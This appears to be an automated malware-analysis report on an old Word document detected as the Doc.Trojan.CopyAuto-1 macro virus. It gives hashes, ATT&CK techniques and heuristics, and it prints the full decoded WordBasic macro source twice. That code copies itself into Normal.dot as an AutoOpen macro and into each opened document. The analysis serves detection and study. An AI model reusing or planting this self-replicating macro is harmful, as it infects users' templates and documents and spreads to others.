Office (OLE) malware analysis — malicious · 9a26517b4b25fa87

MALICIOUS

Office (OLE)

37.5 KB Created: 1980-01-04 20:19:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: d0b07c0ebd964822ba231e7e3bbff254 SHA-1: 1c3f108a45b00d37de8b41fd1bca412aeff52dd8 SHA-256: 9a26517b4b25fa8713e11d0e95fe06427891bf091e4f199d05966b265d166738

128 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a legacy Word document containing a WordBasic macro designed to achieve persistence. The macro attempts to copy itself to the Normal.dot template as 'AutoOpen', which will execute automatically when Microsoft Word is launched. This behavior is indicative of a macro-based malware dropper aiming to maintain a foothold on the system.

Heuristics 4

ClamAV: Doc.Trojan.CopyAuto-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.CopyAuto-1
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro

Matched line in script

  If WordBasic.[MacroName$](i) = "AutoOpen" Then NormalAutoOpen = 1

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4042 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4042 bytes
SHA-256: `46ba3eb3fea527412b700b3a8a2735b65579363ca2ae24f0da6c34991de5c9e5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "CopyAutoOpen" Public Sub MAIN() Dim i Dim NormalAutoOpen Dim NormalCopyAutoOpen Dim ActiveAutoOpen Dim ActiveCopyAutoOpen Dim NewFileName$ For i = 1 To WordBasic.CountMacros() If WordBasic.[MacroName$](i) = "AutoOpen" Then NormalAutoOpen = 1 If WordBasic.[MacroName$](i) = "CopyAutoOpen" Then NormalCopyAutoOpen = 1 Next i For i = 1 To WordBasic.CountMacros(1) If WordBasic.[MacroName$](i, 1) = "AutoOpen" Then ActiveAutoOpen = 1 If WordBasic.[MacroName$](i, 1) = "CopyAutoOpen" Then ActiveCopyAutoOpen = 1 Next i NewFileName$ = WordBasic.[FileName$]() If NormalAutoOpen = 0 Then WordBasic.Organizer Copy:=1, Source:=WordBasic.[FileName$](), Destination:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Name:="CopyAutoOpen", NewName:="CopyAutoOpen", Tab:=3 WordBasic.Organizer Rename:=1, Source:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Destination:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Name:="CopyAutoOpen", NewName:="AutoOpen", Tab:=3 End If If NormalCopyAutoOpen = 0 Then WordBasic.Organizer Copy:=1, Source:=WordBasic.[FileName$](), Destination:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Name:="CopyAutoOpen", NewName:="CopyAutoOpen", Tab:=3 End If If ActiveAutoOpen = 0 Then WordBasic.FileSaveAs Name:=NewFileName$, Format:=1 WordBasic.Organizer Copy:=1, Source:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Destination:=NewFileName$, Name:="CopyAutoOpen", NewName:="CopyAutoOpen", Tab:=3 WordBasic.Organizer Rename:=1, Source:=NewFileName$, Destination:=NewFileName$, Name:="CopyAutoOpen", NewName:="AutoOpen", Tab:=3 End If If ActiveCopyAutoOpen = 0 Then WordBasic.Organizer Copy:=1, Source:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Destination:=NewFileName$, Name:="CopyAutoOpen", NewName:="CopyAutoOpen", Tab:=3 End If WordBasic.FileSaveAs Name:=NewFileName$, Format:=1 End Sub Attribute VB_Name = "AutoOpen" Public Sub MAIN() Dim i Dim NormalAutoOpen Dim NormalCopyAutoOpen Dim ActiveAutoOpen Dim ActiveCopyAutoOpen Dim NewFileName$ For i = 1 To WordBasic.CountMacros() If WordBasic.[MacroName$](i) = "AutoOpen" Then NormalAutoOpen = 1 If WordBasic.[MacroName$](i) = "CopyAutoOpen" Then NormalCopyAutoOpen = 1 Next i For i = 1 To WordBasic.CountMacros(1) If WordBasic.[MacroName$](i, 1) = "AutoOpen" Then ActiveAutoOpen = 1 If WordBasic.[MacroName$](i, 1) = "CopyAutoOpen" Then ActiveCopyAutoOpen = 1 Next i NewFileName$ = WordBasic.[FileName$]() If NormalAutoOpen = 0 Then WordBasic.Organizer Copy:=1, Source:=WordBasic.[FileName$](), Destination:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Name:="CopyAutoOpen", NewName:="CopyAutoOpen", Tab:=3 WordBasic.Organizer Rename:=1, Source:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Destination:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Name:="CopyAutoOpen", NewName:="AutoOpen", Tab:=3 End If If NormalCopyAutoOpen = 0 Then WordBasic.Organizer Copy:=1, Source:=WordBasic.[FileName$](), Destination:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Name:="CopyAutoOpen", NewName:="CopyAutoOpen", Tab:=3 End If If ActiveAutoOpen = 0 Then WordBasic.FileSaveAs Name:=NewFileName$, Format:=1 WordBasic.Organizer Copy:=1, Source:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Destination:=NewFileName$, Name:="CopyAutoOpen", NewName:="CopyAutoOpen", Tab:=3 WordBasic.Organizer Rename:=1, Source:=NewFileName$, Destination:=NewFileName$, Name:="CopyAutoOpen", NewName:="AutoOpen", Tab:=3 End If If ActiveCopyAutoOpen = 0 Then WordBasic.Organizer Copy:=1, Source:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Destination:=NewFileName$, Name:="CopyAutoOpen", NewName:="CopyAutoOpen", Tab:=3 End If WordBasic.FileSaveAs Name:=NewFileName$, Format:=1 End Sub

SHA-256: 46ba3eb3fea527412b700b3a8a2735b65579363ca2ae24f0da6c34991de5c9e5

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "CopyAutoOpen"

Public Sub MAIN()
Dim i
Dim NormalAutoOpen
Dim NormalCopyAutoOpen
Dim ActiveAutoOpen
Dim ActiveCopyAutoOpen
Dim NewFileName$
For i = 1 To WordBasic.CountMacros()
  If WordBasic.[MacroName$](i) = "AutoOpen" Then NormalAutoOpen = 1
  If WordBasic.[MacroName$](i) = "CopyAutoOpen" Then NormalCopyAutoOpen = 1
Next i

For i = 1 To WordBasic.CountMacros(1)
  If WordBasic.[MacroName$](i, 1) = "AutoOpen" Then ActiveAutoOpen = 1
  If WordBasic.[MacroName$](i, 1) = "CopyAutoOpen" Then ActiveCopyAutoOpen = 1
Next i

NewFileName$ = WordBasic.[FileName$]()

If NormalAutoOpen = 0 Then
  WordBasic.Organizer Copy:=1, Source:=WordBasic.[FileName$](), Destination:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Name:="CopyAutoOpen", NewName:="CopyAutoOpen", Tab:=3
  WordBasic.Organizer Rename:=1, Source:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Destination:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Name:="CopyAutoOpen", NewName:="AutoOpen", Tab:=3
End If

If NormalCopyAutoOpen = 0 Then
  WordBasic.Organizer Copy:=1, Source:=WordBasic.[FileName$](), Destination:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Name:="CopyAutoOpen", NewName:="CopyAutoOpen", Tab:=3
End If

If ActiveAutoOpen = 0 Then
  WordBasic.FileSaveAs Name:=NewFileName$, Format:=1
  WordBasic.Organizer Copy:=1, Source:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Destination:=NewFileName$, Name:="CopyAutoOpen", NewName:="CopyAutoOpen", Tab:=3
  WordBasic.Organizer Rename:=1, Source:=NewFileName$, Destination:=NewFileName$, Name:="CopyAutoOpen", NewName:="AutoOpen", Tab:=3
End If

If ActiveCopyAutoOpen = 0 Then
  WordBasic.Organizer Copy:=1, Source:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Destination:=NewFileName$, Name:="CopyAutoOpen", NewName:="CopyAutoOpen", Tab:=3
End If
WordBasic.FileSaveAs Name:=NewFileName$, Format:=1
End Sub

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
Dim i
Dim NormalAutoOpen
Dim NormalCopyAutoOpen
Dim ActiveAutoOpen
Dim ActiveCopyAutoOpen
Dim NewFileName$
For i = 1 To WordBasic.CountMacros()
  If WordBasic.[MacroName$](i) = "AutoOpen" Then NormalAutoOpen = 1
  If WordBasic.[MacroName$](i) = "CopyAutoOpen" Then NormalCopyAutoOpen = 1
Next i

For i = 1 To WordBasic.CountMacros(1)
  If WordBasic.[MacroName$](i, 1) = "AutoOpen" Then ActiveAutoOpen = 1
  If WordBasic.[MacroName$](i, 1) = "CopyAutoOpen" Then ActiveCopyAutoOpen = 1
Next i

NewFileName$ = WordBasic.[FileName$]()

If NormalAutoOpen = 0 Then
  WordBasic.Organizer Copy:=1, Source:=WordBasic.[FileName$](), Destination:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Name:="CopyAutoOpen", NewName:="CopyAutoOpen", Tab:=3
  WordBasic.Organizer Rename:=1, Source:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Destination:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Name:="CopyAutoOpen", NewName:="AutoOpen", Tab:=3
End If

If NormalCopyAutoOpen = 0 Then
  WordBasic.Organizer Copy:=1, Source:=WordBasic.[FileName$](), Destination:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Name:="CopyAutoOpen", NewName:="CopyAutoOpen", Tab:=3
End If

If ActiveAutoOpen = 0 Then
  WordBasic.FileSaveAs Name:=NewFileName$, Format:=1
  WordBasic.Organizer Copy:=1, Source:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Destination:=NewFileName$, Name:="CopyAutoOpen", NewName:="CopyAutoOpen", Tab:=3
  WordBasic.Organizer Rename:=1, Source:=NewFileName$, Destination:=NewFileName$, Name:="CopyAutoOpen", NewName:="AutoOpen", Tab:=3
End If

If ActiveCopyAutoOpen = 0 Then
  WordBasic.Organizer Copy:=1, Source:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Destination:=NewFileName$, Name:="CopyAutoOpen", NewName:="CopyAutoOpen", Tab:=3
End If
WordBasic.FileSaveAs Name:=NewFileName$, Format:=1
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.